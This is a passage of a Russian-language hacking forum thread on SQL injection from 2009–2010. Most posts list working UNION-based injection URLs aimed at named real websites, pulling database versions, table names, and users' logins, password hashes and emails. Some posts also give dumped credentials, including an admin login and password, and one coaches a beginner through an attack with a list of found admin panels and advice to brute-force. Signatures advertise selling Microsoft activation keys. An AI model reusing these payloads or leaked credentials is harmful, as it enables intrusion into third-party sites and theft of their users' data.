| Друзья: Всё для вебмастера | [ Реклама на форуме ] |
|
1
SQL-injection
Автор
Ky3bMu4
, 28 May 2007 17:45
Наверх
#79
Отправлено 01 June 2009 - 17:22
xUnu
-
- Members
-
- 65 сообщений
Байт
SQL -
4b117e26ba0fd7e082474e4890a85452:boris26U
0404b733bb20f1593b10914a5b865e60:wilde54
--------------------------------------------------------------------------
я нашел таблицу users --- первый раз вижу такую скулю
4b117e26ba0fd7e082474e4890a85452:boris26U
0404b733bb20f1593b10914a5b865e60:wilde54
--------------------------------------------------------------------------
http://www.geneticsandsociety.org/article.php?id=305+unION+aLL+seLECT+coNCAT_ws(chAR(42,42,42),0x3a,user(),database(),version())+from+users***genetics@sadie***genetics***4.1.21-standard-log
я нашел таблицу users --- первый раз вижу такую скулю
[COLOR=White]
O_o
O_o
#80
Отправлено 02 June 2009 - 17:33
Cлоны_они_повсюду
-
- Members
- 33 сообщений
Бит
http://www.informarket.ru/index.php?p_id=-15+union+select+concat_ws(0x3a,table_name,column_name),2,3,4,5,6,7,8,9,10+from+information_schema.columns+limit+1,1000-- http://www.ccfrussia.ru/index.php?mod=p_article&p_id=-210+union+select+1,2,3,4,5,version(),7,8,9,10,12,13,14-- http://www.savatouristik.ru/index.php?toid=-3+union+select+1,version()-- http://www.ocenter.ru/index.php?id=files&action=show&a=-62+union+select+1,version(),3,4,5,6,7,8-- http://games.tvercity.ru/?id=articles&action=show&a=-62+union+select+1,version(),3,4,5,6,7,8-- http://bolashak.kz/?type=news&id=-117+union+select+1,2,3,version(),5,6,7,8-- http://sluganaroda.ru/index.php?action=news&mode=news&mode=full&id=-33+union+select+1,2,3,4,version()-- http://www.tltinfo.ru/law/index.php?id=-834+union+select+1,2,3,4,5,6,7,version()-- http://www.1radio.ru/?app=&file=aticles&do=one&id=-32+union+select+1,2,version(),4,5,6-- http://www.thod.org/content.php3?id=-31+union+select+1,2,3,4,version(),6,7-- http://shirleyofhollywood.ru/cat.php?id=-10+union+select+version(),2-- http://www.electrobud.com.ua/index.php?menu=tree&idtree=-1+union+select+1,2,version(),4,5,6-- http://www.1radio.ru/?app=&file=news&do=one&news=-40+union+select+1,2,3,version(),5,6,7,8--
#81
Отправлено 04 June 2009 - 10:18
Cлоны_они_повсюду
-
- Members
- 33 сообщений
Бит
http://www.f1-world.ru/drivers/drvinfo.php3?id=-1199701021+union+select+1,concat_ws(0x3a3a,NickName,PassWd,Email,ICQ),3,4,5,6,7,8,9,10+from+fusers+limit+1,10000--
http://www.f1-world.ru/drivers/drvinfo.php3?id=-1199701021+union+select+1,concat_ws(0x3a,table_name,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+limit+1,10000--
#82
Отправлено 12 June 2009 - 10:55
legion2k
-
- Members
- 37 сообщений
Бит
hxxp://www.dofus.us/list.php?id=9999999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6 hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x7361646d696e hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,concat_ws(0x3a,id,usname,paswd),4,5,6+from+sadmin hxxp://pro-us-game.com/vov_levelpack_add_.php?id=-9_99+union+select+1,2,3,version(),5,6,user(),8,database(),10,11,12 hxxp://www.x-race.it/shop.php?id=-23+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5 hxxp://syspay.info/article.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6 hxxp://www.w2wventures.com/education/articles/index.php?id=-164+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,8,9,10,11 hxxp://www.nhia.edu/calendar.php?id=-430+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26
#83
Отправлено 12 June 2009 - 13:25
Cлоны_они_повсюду
-
- Members
- 33 сообщений
Бит
Большой список таблиц
]]>список сайтов к которым подходят пароли из бд]]>
все админки находятся по адресу http:\\[site]\admin.php
первый раз вижу чтобы такое количество сайтов было в одной бд
список таблиц
логин пароль админа
stp_master:a3xx-100
админку так найти и несмог =)) может вам повезёт !!!!
http://stroyvariant.ru/?page=katr&id=-1002+union+select+1,2,concat_ws(0x3a,table_name,column_name),4,5+from+information_schema.columns+limit+1,1000--
]]>список сайтов к которым подходят пароли из бд]]>
все админки находятся по адресу http:\\[site]\admin.php
первый раз вижу чтобы такое количество сайтов было в одной бд
список таблиц
http://www.stplus.ru/partners.php?type_p=3+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6,7,8,9,10+from+information_schema.columns+limit+1,1000/*
логин пароль админа
stp_master:a3xx-100
админку так найти и несмог =)) может вам повезёт !!!!
#86
Отправлено 21 August 2009 - 16:38
xUnu
-
- Members
-
- 65 сообщений
Байт
http://www.universpain.com/Russian/view-links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.barroecor.com.br/cor.php?id=-1/**/uNiON+aLL/**/seLECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,version(),user(),database()),0x71),0x71),3,4
http://www.improvisedmusic.ie/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,2,version(),4,5%20+--+
http://www.improvisedmusic.ie/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,2,coNCAt(user_email,0x3a,user_pass,0x3a,user_firstname,0x3a,user_firstname),4,5/**/FROM/**/user/**/limit/**/0,1+--+
http://www.universpain.com/Russian/view-links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.webclutter.com/links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.spacebucket.com/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,user(),version(),database(),5,6/*
[COLOR=White]
O_o
O_o
#87
Отправлено 08 September 2009 - 10:07
liv
-
-
Banned - 2 сообщений
Бит
#88
Отправлено 21 November 2009 - 21:12
Cлоны_они_повсюду
-
- Members
- 33 сообщений
Бит
_http://umnaymama.ru/admin/catalogshow.php?show=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,table_name,column_name),8,9,10+from+information_schema.co
lumns+limit+1,1000--
_http://webdoski.ru/show.php?sn=-149+union+select+1,concat_ws(0x3a3a,login,password,email)+from+users+limit+1,1000--
P.S Форум мёртв ?
lumns+limit+1,1000--
_http://webdoski.ru/show.php?sn=-149+union+select+1,concat_ws(0x3a3a,login,password,email)+from+users+limit+1,1000--
P.S Форум мёртв ?
#89
Отправлено 21 November 2009 - 21:20
$iD
-
- root
-
- 3785 сообщений
Админ
Цитата
P.S Форум мёртв ?
#90
Отправлено 10 January 2010 - 08:04
Jaba
-
- Members
- 5 сообщений
Бит
подскажите я только начал изучать инъекции, вот что мне делать дальше
]]>http://www.winekitz....from mysql.user]]>
какое отрицательное ??в столбе
]]>http://www.winekitz....from mysql.user]]>
какое отрицательное ??в столбе
#93
Отправлено 12 January 2010 - 11:47
DarckSol
-
- Extended
-
- 95 сообщений
Байт
Jaba (10.1.2010, 8:04) писал:
подскажите я только начал изучать инъекции, вот что мне делать дальше
]]>http://www.winekitz....from mysql.user]]>
какое отрицательное ??в столбе
]]>http://www.winekitz....from mysql.user]]>
какое отрицательное ??в столбе
http://www.winekitz.com/index.php?id=9999+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20,16,17,18,19,20,21,22,23,24,25,26,27,28,29--User:yourcms_lynch
BD:yourcms_db
Version Sql:4.1.22-standard
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>
#95
Отправлено 13 January 2010 - 11:50
DarckSol
-
- Extended
-
- 95 сообщений
Байт
Page Found: ]]>http://www.winekitz.com/admin/]]>
Page Found: ]]>http://www.winekitz.com/login.php]]>
Page Found: ]]>http://www.winekitz.com/manager/]]>
Page Found: ]]>http://www.winekitz.com/controlpanel/]]>
Page Found: ]]>http://www.winekitz.com/cpanel/]]>
Page Found: ]]>http://www.winekitz.com/kpanel/]]>
Найдены мной панели управления...
3 последних управления хостингом... там cPanel
3 первыйх для управления сайтом, пароли искать в базе данных, база 4, брутить названия ручками....
Для расширения кругозора и понимания происходящего советую почитать тут ]]>http://pro-hack.ru/f...?showtopic=6217]]>
Page Found: ]]>http://www.winekitz.com/login.php]]>
Page Found: ]]>http://www.winekitz.com/manager/]]>
Page Found: ]]>http://www.winekitz.com/controlpanel/]]>
Page Found: ]]>http://www.winekitz.com/cpanel/]]>
Page Found: ]]>http://www.winekitz.com/kpanel/]]>
Найдены мной панели управления...
3 последних управления хостингом... там cPanel
3 первыйх для управления сайтом, пароли искать в базе данных, база 4, брутить названия ручками....
Для расширения кругозора и понимания происходящего советую почитать тут ]]>http://pro-hack.ru/f...?showtopic=6217]]>
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>
#96
Отправлено 21 May 2010 - 05:44
4NearU4
-
- Members
-
- 84 сообщений
Байт
не знаешь с чего начать?что делать? помогу, спамить в личку.
Количество пользователей, читающих эту тему: 1
0 пользователей, 1 гостей, 0 анонимных
